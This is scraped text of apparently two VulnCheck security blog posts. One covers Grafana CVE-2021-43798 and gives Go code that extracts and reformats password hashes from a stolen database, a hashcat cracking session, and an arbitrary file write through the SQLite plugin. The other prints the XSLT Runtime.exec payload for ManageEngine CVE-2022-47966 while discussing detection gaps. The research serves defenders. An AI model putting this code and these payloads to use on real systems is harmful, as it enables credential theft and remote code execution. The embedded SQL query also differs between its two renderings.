This is achieved with a small amount of Go:",[1354,108693,108695],{"className":19022,"code":108694,"language":19024,"meta":219,"style":219},"\u002F\u002F grab the usernames, passwords and salts from the downloaded db\n\u002F\u002F (assumes db is an open *sql.DB on the exfiltrated grafana.db, hash_file is\n\u002F\u002F an *os.File opened for writing, and b64 aliases encoding\u002Fbase64)\nrows, err := db.Query(\"select email,password,salt from user\")\nif err != nil {\n    return\n}\ndefer rows.Close()\n\nfor rows.Next() {\n    var email string\n    var password string\n    var salt string\n    \u002F\u002F Scan needs exactly one destination per selected column\n    err = rows.Scan(&email, &password, &salt)\n    if err != nil {\n        return\n    }\n\n    \u002F\u002F the db stores the PBKDF2 output as hex; hashcat mode 10900 wants base64\n    decoded_hash, err := hex.DecodeString(password)\n    if err != nil {\n        return\n    }\n    hash64 := b64.StdEncoding.EncodeToString(decoded_hash)\n    salt64 := b64.StdEncoding.EncodeToString([]byte(salt))\n    _, _ = hash_file.WriteString(\"sha256:10000:\" + salt64 + \":\" + hash64 + \"\\n\")\n}\n",[886,108696,108697,108702,108731,108743,108747,108751,108765,108769,108784,108794,108803,108812,108846,108858,108864,108868,108872,108896,108924,108951,109006],{"__ignoreMap":219},[1373,108698,108699],{"class":1375,"line":1376},[1373,108700,108701],{"class":4630},"\u002F\u002F grab the usernames, passwords and salts from the downloaded db\n",[1373,108703,108704,108707,108709,108711,108713,108716,108718,108720,108722,108724,108727,108729],{"class":1375,"line":220},[1373,108705,108706],{"class":4640},"rows",[1373,108708,5437],{"class":1383},[1373,108710,90303],{"class":4640},[1373,108712,20584],{"class":1397},[1373,108714,108715],{"class":4640}," db",[1373,108717,59],{"class":1383},[1373,108719,105547],{"class":7297},[1373,108721,1384],{"class":1383},[1373,108723,183],{"class":1387},[1373,108725,108726],{"class":1391},"select email,password,salt,is_admin from 
user",[1373,108728,183],{"class":1387},[1373,108730,11875],{"class":1383},[1373,108732,108733,108735,108737,108739,108741],{"class":1375,"line":1266},[1373,108734,4637],{"class":4636},[1373,108736,90303],{"class":4640},[1373,108738,15677],{"class":1397},[1373,108740,19247],{"class":7054},[1373,108742,4765],{"class":1383},[1373,108744,108745],{"class":1375,"line":1852},[1373,108746,78549],{"class":4636},[1373,108748,108749],{"class":1375,"line":4692},[1373,108750,1855],{"class":1383},[1373,108752,108753,108756,108759,108761,108763],{"class":1375,"line":4724},[1373,108754,108755],{"class":4636},"defer",[1373,108757,108758],{"class":4640}," rows",[1373,108760,59],{"class":1383},[1373,108762,90791],{"class":7297},[1373,108764,27326],{"class":1383},[1373,108766,108767],{"class":1375,"line":4756},[1373,108768,6520],{"emptyLinePlaceholder":237},[1373,108770,108771,108773,108775,108777,108780,108782],{"class":1375,"line":4768},[1373,108772,98551],{"class":4636},[1373,108774,108758],{"class":4640},[1373,108776,59],{"class":1383},[1373,108778,108779],{"class":7297},"Next",[1373,108781,7514],{"class":1383},[1373,108783,4765],{"class":1383},[1373,108785,108786,108788,108791],{"class":1375,"line":4792},[1373,108787,90591],{"class":1397},[1373,108789,108790],{"class":4640}," email ",[1373,108792,108793],{"class":7293},"string\n",[1373,108795,108796,108798,108801],{"class":1375,"line":4798},[1373,108797,90591],{"class":1397},[1373,108799,108800],{"class":4640}," password ",[1373,108802,108793],{"class":7293},[1373,108804,108805,108807,108810],{"class":1375,"line":4806},[1373,108806,90591],{"class":1397},[1373,108808,108809],{"class":4640}," salt ",[1373,108811,108793],{"class":7293},[1373,108813,108814,108817,108819,108821,108823,108826,108828,108830,108832,108834,108836,108838,108840,108842,108844],{"class":1375,"line":4817},[1373,108815,108816],{"class":4640},"    err 
",[1373,108818,5417],{"class":1397},[1373,108820,108758],{"class":4640},[1373,108822,59],{"class":1383},[1373,108824,108825],{"class":7297},"Scan",[1373,108827,1384],{"class":1383},[1373,108829,7218],{"class":1397},[1373,108831,105920],{"class":4640},[1373,108833,5437],{"class":1383},[1373,108835,87587],{"class":1397},[1373,108837,86310],{"class":4640},[1373,108839,5437],{"class":1383},[1373,108841,87587],{"class":1397},[1373,108843,108654],{"class":4640},[1373,108845,11875],{"class":1383},[1373,108847,108848,108850,108852,108854,108856],{"class":1375,"line":4825},[1373,108849,4695],{"class":4636},[1373,108851,90303],{"class":4640},[1373,108853,15677],{"class":1397},[1373,108855,19247],{"class":7054},[1373,108857,4765],{"class":1383},[1373,108859,108860,108862],{"class":1375,"line":4835},[1373,108861,97593],{"class":4636},[1373,108863,16195],{"class":14985},[1373,108865,108866],{"class":1375,"line":4843},[1373,108867,4795],{"class":1383},[1373,108869,108870],{"class":1375,"line":4849},[1373,108871,6520],{"emptyLinePlaceholder":237},[1373,108873,108874,108877,108879,108881,108883,108885,108887,108890,108892,108894],{"class":1375,"line":4877},[1373,108875,108876],{"class":4640},"    decoded_hash",[1373,108878,5437],{"class":1383},[1373,108880,90724],{"class":4640},[1373,108882,20584],{"class":1397},[1373,108884,89478],{"class":4640},[1373,108886,59],{"class":1383},[1373,108888,108889],{"class":7297},"DecodeString",[1373,108891,1384],{"class":1383},[1373,108893,86310],{"class":4640},[1373,108895,11875],{"class":1383},[1373,108897,108898,108901,108903,108905,108907,108909,108911,108913,108915,108917,108919,108922],{"class":1375,"line":4915},[1373,108899,108900],{"class":4640},"    hash64 
",[1373,108902,20584],{"class":1397},[1373,108904,82963],{"class":4640},[1373,108906,59],{"class":1383},[1373,108908,82968],{"class":4640},[1373,108910,59],{"class":1383},[1373,108912,82973],{"class":7297},[1373,108914,82976],{"class":1383},[1373,108916,82979],{"class":7293},[1373,108918,1384],{"class":1383},[1373,108920,108921],{"class":4640},"decoded_hash",[1373,108923,16761],{"class":1383},[1373,108925,108926,108929,108931,108933,108935,108937,108939,108941,108943,108945,108947,108949],{"class":1375,"line":4931},[1373,108927,108928],{"class":4640},"    salt64 ",[1373,108930,20584],{"class":1397},[1373,108932,82963],{"class":4640},[1373,108934,59],{"class":1383},[1373,108936,82968],{"class":4640},[1373,108938,59],{"class":1383},[1373,108940,82973],{"class":7297},[1373,108942,82976],{"class":1383},[1373,108944,82979],{"class":7293},[1373,108946,1384],{"class":1383},[1373,108948,108654],{"class":4640},[1373,108950,16761],{"class":1383},[1373,108952,108953,108955,108957,108959,108961,108964,108966,108969,108971,108973,108976,108978,108980,108983,108985,108987,108989,108991,108993,108996,108998,109000,109002,109004],{"class":1375,"line":4947},[1373,108954,90746],{"class":4640},[1373,108956,5437],{"class":1383},[1373,108958,90724],{"class":4640},[1373,108960,5417],{"class":1397},[1373,108962,108963],{"class":4640}," hash_file",[1373,108965,59],{"class":1383},[1373,108967,108968],{"class":7297},"WriteString",[1373,108970,1384],{"class":1383},[1373,108972,183],{"class":1387},[1373,108974,108975],{"class":1391},"sha256:10000:",[1373,108977,183],{"class":1387},[1373,108979,15478],{"class":1397},[1373,108981,108982],{"class":4640}," salt64 ",[1373,108984,15448],{"class":1397},[1373,108986,4883],{"class":1387},[1373,108988,4606],{"class":1391},[1373,108990,183],{"class":1387},[1373,108992,15478],{"class":1397},[1373,108994,108995],{"class":4640}," hash64 
",[1373,108997,15448],{"class":1397},[1373,108999,4883],{"class":1387},[1373,109001,8943],{"class":2326},[1373,109003,183],{"class":1387},[1373,109005,11875],{"class":1383},[1373,109007,109008],{"class":1375,"line":4952},[1373,109009,1855],{"class":1383},[18,109011,109012,109013,109015],{},"The example code above will transform the previously shown ",[886,109014,39933],{}," table into the following Hashcat-ingestible hashes:",[1354,109017,109020],{"className":109018,"code":109019,"language":1359,"meta":219},[1357],"sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=\nsha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c\u002F+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM=\nsha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=\n",[886,109021,109019],{"__ignoreMap":219},[18,109023,109024,109025,109029],{},"At this point, it’s useful to know that Grafana ",[47,109026,109028],{"href":109027},"https:\u002F\u002Fcommunity.grafana.com\u002Ft\u002Fminimum-password-requirements\u002F62819","doesn’t enforce"," any type of password complexity requirements. The sole requirement is that a password must be four characters or longer. The likelihood of a bad password is quite high. 
As a contrived example, we provide the hashes from our test Grafana server to Hashcat along with a standard password dictionary, and recover two passwords:",[1354,109031,109033],{"className":31740,"code":109032,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~$ hashcat -m 10900 10.9.49.222_3000_hashes.txt rockyou.txt -o cracked.out\nalbinolobster@mournland:~$ cat cracked.out\nsha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=:password\nsha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=:iloveyou\n",[886,109034,109035,109058,109066,109074],{"__ignoreMap":219},[1373,109036,109037,109039,109042,109044,109047,109050,109053,109055],{"class":1375,"line":1376},[1373,109038,55482],{"class":2206},[1373,109040,109041],{"class":1391}," hashcat",[1373,109043,84634],{"class":2209},[1373,109045,109046],{"class":5467}," 10900",[1373,109048,109049],{"class":1391}," 10.9.49.222_3000_hashes.txt",[1373,109051,109052],{"class":1391}," rockyou.txt",[1373,109054,39692],{"class":2209},[1373,109056,109057],{"class":1391}," cracked.out\n",[1373,109059,109060,109062,109064],{"class":1375,"line":220},[1373,109061,55482],{"class":2206},[1373,109063,70263],{"class":1391},[1373,109065,109057],{"class":1391},[1373,109067,109068,109071],{"class":1375,"line":1266},[1373,109069,109070],{"class":2206},"sha256:10000:YmhoVmdUbnM5bw",[1373,109072,109073],{"class":1391},"==:IK4uKCjABO9GOPbUkKI6qZVsxL\u002FrHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg=:password\n",[1373,109075,109076,109079],{"class":1375,"line":1852},[1373,109077,109078],{"class":2206},"sha256:10000:TmNnZlRkendQYw",[1373,109080,109081],{"class":1391},"==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg=:iloveyou\n",[18,109083,109084,109085,109087,109088,108511],{},"Exfiltrating the SQLite database, extracting password hashes, and cracking them seems to be a reasonable approach for gaining access into the 
Grafana Web UI. To me, this is obviously better than exfiltrating ",[886,109086,108004],{}," and likely better than focusing on the ",[886,109089,108452],{},[61,109091,109093],{"id":109092},"expanding-access","Expanding Access",[18,109095,109096,109097,59],{},"The obvious question now is, “What do Web UI credentials get me?” Surprisingly, even with an admin account, not much. We did solve one problem. The Grafana server should have access to all data source servers, so we should be able to proxy attacks (e.g. PostgreSQL command execution) through the Grafana server. But otherwise, a lot of administrative functionality is built into the Grafana CLI tool and excluded from the web interface (as we can see, rightly so). There is one useful feature an administrator has access to in the web UI: installing plugins from the ",[47,109098,109101],{"href":109099,"rel":109100},"https:\u002F\u002Fgrafana.com\u002Fgrafana\u002Fplugins\u002F",[51],"Grafana Catalog",[18,109103,109104],{},"One plugin that proves useful is the SQLite plugin.",[18,109106,109107],{},[68,109108],{":width":10862,"alt":108067,"src":109109},"\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fgrafana-sqlite-plugin.png",[18,109111,109112],{},"This blog is centered around exfiltrating Grafana’s SQLite database. Exfiltration with CVE-2021-43798 gave us read access to the database. The SQLite plugin gives us full write access to the Grafana database.",[18,109114,109115],{},[68,109116],{":width":10862,"alt":109117,"src":109118},"Grafana SQLite Data Source","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fsqlite-data-source.png",[18,109120,109121,109122,109125,109126,109130],{},"Being able to arbitrarily modify the Grafana database doesn’t lead to any obvious code execution opportunities (that we saw). But SQLite has a couple of interesting features that could potentially result in code execution. The first feature we looked at was ",[886,109123,109124],{},"load_extension",". 
This ",[47,109127,8560],{"href":109128,"rel":109129},"https:\u002F\u002Fwww.sqlite.org\u002Flang_corefunc.html#load_extension",[51]," could allow us to load and execute a shared object. However, the Grafana plugin has this feature disabled:",[18,109132,109133],{},[68,109134],{":width":10862,"alt":109135,"src":109136},"Grafana Load Extension Attempt","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fload-extension.png",[18,109138,109139,109140,109143,109144,109149,109150,4606],{},"The other potentially abusable SQLite feature is an arbitrary file write using ",[886,109141,109142],{},"attach database",". The ",[47,109145,109148],{"href":109146,"rel":109147},"https:\u002F\u002Fwww.sqlite.org\u002Flang_attach.html",[51],"created file"," will be an sqlite3 database, but others have achieved code execution with this method by targeting loose file formats (e.g. PHP). Grafana is largely Go-based (and has no association with PHP) but we can at least establish the arbitrary file write works. Below we attempt to make the file ",[886,109151,109152],{},"\u002Fvar\u002Flib\u002Fgrafana\u002Fplugins\u002Ffrser-sqlite-datasource\u002Fimg\u002Fvulncheck.html",[18,109154,109155],{},[68,109156],{":width":10862,"alt":109157,"src":109158},"Grafana File Write Query","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fsqlite-write-primitive.png",[18,109160,109161],{},"The write is successful. We know this because we can fetch the file over HTTP.",[18,109163,109164],{},[68,109165],{":width":10862,"alt":109166,"src":109167},"Grafana Write Success","\u002Fblog\u002Fgrafana-cve-2021-43798\u002Fwrite-success.png",[18,109169,109170,109171,109173,109174,109176,109177,109180],{},"The Grafana SQLite plugin gives us a write primitive on the server itself. However, assuming Grafana is running as the ",[886,109172,108091],{}," user, there aren't a lot of places an attacker can actually write to. 
",[886,109175,108091],{}," is largely limited to the ",[886,109178,109179],{},"\u002Fvar\u002Flib\u002Fgrafana\u002Fplugins\u002F"," directory tree where all the Grafana plugins are stored. Plugins are a mix of Go, JavaScript, HTML, and CSS, so there is opportunity to modify plugins to further expand our reach on the system. That’s an exercise we’ll leave for another time, though.",[18,109182,109183],{},"Of course, the attacker could also just drop all tables and destroy the system. 🤷",[61,109185,1903],{"id":1902},[18,109187,109188],{},"In this blog, we looked at a file disclosure vulnerability affecting Grafana and examined how this issue might be used to gain additional access to the affected system. Exfiltrating the Grafana SQLite database allows attackers to extract password hashes, brute-force them, and, potentially, establish administrative access on the system. Administrative access gives the attacker write access to the underlying SQLite database via a plugin. In turn, the write access gives the attacker the ability to write files to the underlying filesystem (or destroy the database).",[18,109190,109191],{},"Brute-forcing passwords can take a long time. A very long time. But once cracked, the attacker has that password forever. If your Grafana server was ever affected by this vulnerability, and exposed to the internet, it would be wise to rotate all passwords (data source passwords included).",[18,109193,109194,109195,109200],{},"VulnCheck tracks vulnerabilities and their exploits. We pride ourselves on knowing which vulnerabilities matter. 
For more information, ",[47,109196,109199],{"href":109197,"rel":109198},"https:\u002F\u002Fvulncheck.com\u002Fregister",[51],"register"," for a VulnCheck account today.",[2901,109202,109203],{},"",{"title":219,"searchDepth":220,"depth":220,"links":109205},[109206,109207,109208,109209,109210,109211],{"id":68326,"depth":220,"text":68327},{"id":107805,"depth":220,"text":107806},{"id":108078,"depth":220,"text":108079},{"id":108555,"depth":220,"text":108556},{"id":109092,"depth":220,"text":109093},{"id":1902,"depth":220,"text":1903},"2023-02-21","Examining previous exploits for Grafana's CVE-2021-43798 and looking for a path to establish initial access.",{"slug":109215},"grafana-cve-2021-43798","\u002Fblog\u002Fgrafana-cve-2021-43798",{"title":107764,"description":109213},"blog\u002Fgrafana-cve-2021-43798",[242,23275],"vqiTnFV6Fus7G52uwY8TzlEsnM2rvBqyrl49eFggWkY",{"id":109222,"title":83481,"articles":109223,"authors":109228,"body":109230,"date":111300,"description":111301,"extension":234,"image":7,"link":7,"meta":111302,"navigation":237,"path":111304,"seo":111305,"series":7,"stem":111306,"subtype":7,"tags":111307,"__hash__":111308},"blog\u002Fblog\u002Fcve-2022-47966-payload.md",[109224],{"title":109225,"source":3494,"link":109226,"date":109227},"Risky Biz 
News: EU cybersecurity agencies warn of Chinese APT spying","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-eu-cybersecurity-agencies","2023-02-16",[109229],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":109231,"toc":111295},[109232,109245,109285,109288,109292,109295,109634,109648,109651,109655,109676,109679,109685,109691,109699,109702,109708,109722,109731,109737,109755,109759,109762,110096,110102,110105,110490,110495,110926,110929,111247,111259,111262,111268,111278,111280,111286,111292],[18,109233,109234,109235,109239,109240,59],{},"One of the many things we do at VulnCheck is track public exploits. We’ve found very few security professionals develop their own original exploits. The exploits we end up tracking are often derivative works based on the first public exploit. This is in full display for ",[47,109236,61670],{"href":109237,"rel":109238},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-47966",[51],", an unauthenticated and remote vulnerability affecting a variety of ",[47,109241,109244],{"href":109242,"rel":109243},"https:\u002F\u002Fwww.manageengine.com\u002Fsecurity\u002Fadvisory\u002FCVE\u002Fcve-2022-47966.html",[51],"Zoho ManageEngine Products",[18,109246,109247,109248,109252,109253,109258,109259,1246,109263,109267,109268,109273,109274,982,109279,109284],{},"The first public exploit published for CVE-2022-47966 was developed by ",[47,109249,100798],{"href":109250,"rel":109251},"https:\u002F\u002Fraw.githubusercontent.com\u002Fhorizon3ai\u002FCVE-2022-47966\u002Fmain\u002FCVE-2022-47966.py",[51]," and published alongside a ",[47,109254,109257],{"href":109255,"rel":109256},"https:\u002F\u002Fwww.horizon3.ai\u002Fmanageengine-cve-2022-47966-technical-deep-dive\u002F",[51],"technical blog",". Following that release, we tracked a number of derivative exploits. Some are useful (e.g. 
",[47,109260,22175],{"href":109261,"rel":109262},"https:\u002F\u002Fgithub.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fpull\u002F6564\u002Ffiles",[51],[47,109264,36852],{"href":109265,"rel":109266},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F17556",[51],"). Some add ",[47,109269,109272],{"href":109270,"rel":109271},"https:\u002F\u002Fgithub.com\u002FInplex-sys\u002FCVE-2022-47966\u002Ftree\u002Fe935a0577ef202f2763b96836fd10336ebc17eec",[51],"stylistic flair",". Some are almost entirely ",[47,109275,109278],{"href":109276,"rel":109277},"https:\u002F\u002Fraw.githubusercontent.com\u002Fp33d\u002FCVE-2022-47966\u002Fmain\u002F47966.py",[51],"copy",[47,109280,109283],{"href":109281,"rel":109282},"https:\u002F\u002Fraw.githubusercontent.com\u002Fnu11secur1ty\u002FCVE-mitre\u002Fcc803c2d49c065fd584ab6d0848373aeaba6b525\u002F2022\u002FCVE-2022-47966\u002FCVE-2022-47966.py",[51],"paste"," jobs. But no matter their differences, they all look, behave, and achieve execution like the original Horizon3.ai exploit.",[263,109286],{":list":109287,"ico":266,"title":83481},"[\"The first public exploit published for CVE-2022-47966 was developed by Horizon3.ai. Since then, VulnCheck has seen more than a dozen derivatives of the exploit that all look, behave, and achieve execution like the original.\",\"The problem with the lack of diversity in public offensive tooling is that it’s mirrored by a lack of diversity in defensive tooling.\",\"Today, there are a few freely available defensive tools that have published detections for CVE-2022-47966 from SigmaHQ, Rapid7 and Proofpoint. 
They all derive from, and are tailored to, the initial proof of concept developed by Horizon3.ai.\",\"However, these tools anticipate exploits that use an XSLT transform that ends in `getRuntime().exec()` in order to execute external programs.\",\"The reality is that an attacker with only a little knowledge can develop a new exploit that follows a completely different path and bypasses most open source detections currently available.\"]",[61,109289,109291],{"id":109290},"payload-similarities","Payload Similarities",[18,109293,109294],{},"Of the exploits mentioned above, all, except Metasploit, use the exact random values that Horizon3.ai embedded in their payload (not a requirement for exploitation). All send the exploit payload using an HTTP POST request. They all use the exact same XSLT transform to achieve arbitrary code execution:",[1354,109296,109298],{"className":27194,"code":109297,"language":27196,"meta":219,"style":219},"\u003Cds:Transforms>\n    \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002F10\u002Fxml-exc-c14n#\"\u002F>\n    \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n     \u003Cxsl:stylesheet version=\"1.0\"\n         xmlns:ob=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Object\"\n         xmlns:rt=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Runtime\"\n         xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n         \u003Cxsl:template match=\"\u002F\">\n             \u003Cxsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"\u002F>\n             \u003Cxsl:variable name=\"process\" select=\"rt:exec($rtobject,'{command}')\"\u002F>\n             \u003Cxsl:variable name=\"processString\" select=\"ob:toString($process)\"\u002F>\n             \u003Cxsl:value-of select=\"$processString\"\u002F>\n         \u003C\u002Fxsl:template>\n     \u003C\u002Fxsl:stylesheet>\n    
\u003C\u002Fds:Transform>\n\u003C\u002Fds:Transforms>\n",[886,109299,109300,109314,109339,109362,109382,109401,109419,109438,109460,109495,109526,109558,109584,109597,109610,109622],{"__ignoreMap":219},[1373,109301,109302,109304,109307,109309,109312],{"class":1375,"line":1376},[1373,109303,11852],{"class":1397},[1373,109305,109306],{"class":4640},"ds",[1373,109308,4606],{"class":4636},[1373,109310,109311],{"class":4640},"Transforms",[1373,109313,6765],{"class":1397},[1373,109315,109316,109318,109320,109322,109325,109328,109330,109332,109335,109337],{"class":1375,"line":220},[1373,109317,8246],{"class":1397},[1373,109319,109306],{"class":4640},[1373,109321,4606],{"class":4636},[1373,109323,109324],{"class":27228},"Transform",[1373,109326,109327],{"class":4640}," Algorithm",[1373,109329,5417],{"class":1397},[1373,109331,183],{"class":1387},[1373,109333,109334],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F2001\u002F10\u002Fxml-exc-c14n#",[1373,109336,183],{"class":1387},[1373,109338,85355],{"class":1397},[1373,109340,109341,109343,109345,109347,109349,109351,109353,109355,109358,109360],{"class":1375,"line":1266},[1373,109342,8246],{"class":1397},[1373,109344,109306],{"class":4640},[1373,109346,4606],{"class":4636},[1373,109348,109324],{"class":27228},[1373,109350,109327],{"class":4640},[1373,109352,5417],{"class":1397},[1373,109354,183],{"class":1387},[1373,109356,109357],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116",[1373,109359,183],{"class":1387},[1373,109361,6765],{"class":1397},[1373,109363,109364,109366,109369,109371,109374,109376,109378,109380],{"class":1375,"line":1852},[1373,109365,85290],{"class":1397},[1373,109367,109368],{"class":4640},"xsl",[1373,109370,4606],{"class":4636},[1373,109372,109373],{"class":4640},"stylesheet 
version",[1373,109375,5417],{"class":1397},[1373,109377,183],{"class":1387},[1373,109379,84878],{"class":1391},[1373,109381,19057],{"class":1387},[1373,109383,109384,109387,109389,109392,109394,109396,109399],{"class":1375,"line":4692},[1373,109385,109386],{"class":4640},"         xmlns",[1373,109388,4606],{"class":4636},[1373,109390,109391],{"class":4640},"ob",[1373,109393,5417],{"class":1397},[1373,109395,183],{"class":1387},[1373,109397,109398],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Object",[1373,109400,19057],{"class":1387},[1373,109402,109403,109405,109407,109410,109412,109414,109417],{"class":1375,"line":4724},[1373,109404,109386],{"class":4640},[1373,109406,4606],{"class":4636},[1373,109408,109409],{"class":4640},"rt",[1373,109411,5417],{"class":1397},[1373,109413,183],{"class":1387},[1373,109415,109416],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjava.lang.Runtime",[1373,109418,19057],{"class":1387},[1373,109420,109421,109423,109425,109427,109429,109431,109434,109436],{"class":1375,"line":4756},[1373,109422,109386],{"class":4640},[1373,109424,4606],{"class":4636},[1373,109426,109368],{"class":4640},[1373,109428,5417],{"class":1397},[1373,109430,183],{"class":1387},[1373,109432,109433],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform",[1373,109435,183],{"class":1387},[1373,109437,6765],{"class":1397},[1373,109439,109440,109443,109445,109447,109450,109452,109454,109456,109458],{"class":1375,"line":4768},[1373,109441,109442],{"class":1397},"         \u003C",[1373,109444,109368],{"class":4640},[1373,109446,4606],{"class":4636},[1373,109448,109449],{"class":4640},"template 
match",[1373,109451,5417],{"class":1397},[1373,109453,183],{"class":1387},[1373,109455,2180],{"class":1391},[1373,109457,183],{"class":1387},[1373,109459,6765],{"class":1397},[1373,109461,109462,109465,109467,109469,109472,109474,109476,109479,109481,109484,109486,109488,109491,109493],{"class":1375,"line":4792},[1373,109463,109464],{"class":1397},"             \u003C",[1373,109466,109368],{"class":4640},[1373,109468,4606],{"class":4636},[1373,109470,109471],{"class":4640},"variable name",[1373,109473,5417],{"class":1397},[1373,109475,183],{"class":1387},[1373,109477,109478],{"class":1391},"rtobject",[1373,109480,183],{"class":1387},[1373,109482,109483],{"class":4640}," select",[1373,109485,5417],{"class":1397},[1373,109487,183],{"class":1387},[1373,109489,109490],{"class":1391},"rt:getRuntime()",[1373,109492,183],{"class":1387},[1373,109494,85355],{"class":1397},[1373,109496,109497,109499,109501,109503,109505,109507,109509,109511,109513,109515,109517,109519,109522,109524],{"class":1375,"line":4798},[1373,109498,109464],{"class":1397},[1373,109500,109368],{"class":4640},[1373,109502,4606],{"class":4636},[1373,109504,109471],{"class":4640},[1373,109506,5417],{"class":1397},[1373,109508,183],{"class":1387},[1373,109510,18710],{"class":1391},[1373,109512,183],{"class":1387},[1373,109514,109483],{"class":4640},[1373,109516,5417],{"class":1397},[1373,109518,183],{"class":1387},[1373,109520,109521],{"class":1391},"rt:exec($rtobject,'{command}')",[1373,109523,183],{"class":1387},[1373,109525,85355],{"class":1397},[1373,109527,109528,109530,109532,109534,109536,109538,109540,109543,109545,109547,109549,109551,109554,109556],{"class":1375,"line":4806},[1373,109529,109464],{"class":1397},[1373,109531,109368],{"class":4640},[1373,109533,4606],{"class":4636},[1373,109535,109471],{"class":4640},[1373,109537,5417],{"class":1397},[1373,109539,183],{"class":1387},[1373,109541,109542],{"class":1391},"processString",[1373,109544,183],{"class":1387},[1373,109546,109483],{"class":4640}
,[1373,109548,5417],{"class":1397},[1373,109550,183],{"class":1387},[1373,109552,109553],{"class":1391},"ob:toString($process)",[1373,109555,183],{"class":1387},[1373,109557,85355],{"class":1397},[1373,109559,109560,109562,109564,109566,109568,109570,109573,109575,109577,109580,109582],{"class":1375,"line":4817},[1373,109561,109464],{"class":1397},[1373,109563,109368],{"class":4640},[1373,109565,4606],{"class":4636},[1373,109567,85021],{"class":4640},[1373,109569,61062],{"class":1397},[1373,109571,109572],{"class":4640},"of select",[1373,109574,5417],{"class":1397},[1373,109576,183],{"class":1387},[1373,109578,109579],{"class":1391},"$processString",[1373,109581,183],{"class":1387},[1373,109583,85355],{"class":1397},[1373,109585,109586,109589,109591,109593,109595],{"class":1375,"line":4825},[1373,109587,109588],{"class":1397},"         \u003C\u002F",[1373,109590,109368],{"class":4640},[1373,109592,4606],{"class":4636},[1373,109594,30296],{"class":4640},[1373,109596,6765],{"class":1397},[1373,109598,109599,109602,109604,109606,109608],{"class":1375,"line":4835},[1373,109600,109601],{"class":1397},"     \u003C\u002F",[1373,109603,109368],{"class":4640},[1373,109605,4606],{"class":4636},[1373,109607,49025],{"class":4640},[1373,109609,6765],{"class":1397},[1373,109611,109612,109614,109616,109618,109620],{"class":1375,"line":4843},[1373,109613,56557],{"class":1397},[1373,109615,109306],{"class":4640},[1373,109617,4606],{"class":4636},[1373,109619,109324],{"class":4640},[1373,109621,6765],{"class":1397},[1373,109623,109624,109626,109628,109630,109632],{"class":1375,"line":4849},[1373,109625,46627],{"class":1397},[1373,109627,109306],{"class":4640},[1373,109629,4606],{"class":4636},[1373,109631,109311],{"class":4640},[1373,109633,6765],{"class":1397},[18,109635,109636,109637,109640,109641,109644,109645,109647],{},"For those unfamiliar with XSLT transforms, the transform above invokes Java’s ",[886,109638,109639],{},"getRuntime().exec()"," with an attacker-provided string. 
For example, the attacker might provide the string ",[886,109642,109643],{},"cmd.exe \u002Fc whoami"," to execute the command ",[886,109646,22876],{},". That’s a fine solution for a proof of concept exploit, but a poor real world solution, as we will soon discuss.",[18,109649,109650],{},"Derivative exploits aren't necessarily a bad thing. For example, it’s great that Nuclei and Metasploit have CVE-2022-47966 implementations. Those tools will be widely used throughout the industry to detect, exploit, and eventually mitigate this vulnerability. The problem with the lack of diversity in public offensive tooling is that it’s mirrored by a lack of diversity in defensive tooling. Meaning, offensive security informs defensive security.",[61,109652,109654],{"id":109653},"detections-for-cve-2022-47966","Detections for CVE-2022-47966",[18,109656,109657,109658,109663,109664,109669,109670,109675],{},"There are a few freely available defensive tools that have published detections for CVE-2022-47966. There’s a ",[47,109659,109662],{"href":109660,"rel":109661},"https:\u002F\u002Fgithub.com\u002FSigmaHQ\u002Fsigma",[51],"Sigma"," rule, a ",[47,109665,109668],{"href":109666,"rel":109667},"https:\u002F\u002Fwww.rapid7.com\u002Fproducts\u002Fvelociraptor\u002F",[51],"Velociraptor"," log parser, and a couple of ",[47,109671,109674],{"href":109672,"rel":109673},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fproducts\u002Fadvanced-threat-protection\u002Fet-intelligence",[51],"Emerging Threats"," network signatures. 
All of these detections derive from, and are tailored to, the initial proof of concept developed by Horizon3.ai.

Consider these two Suricata rules published by Emerging Threats:

```
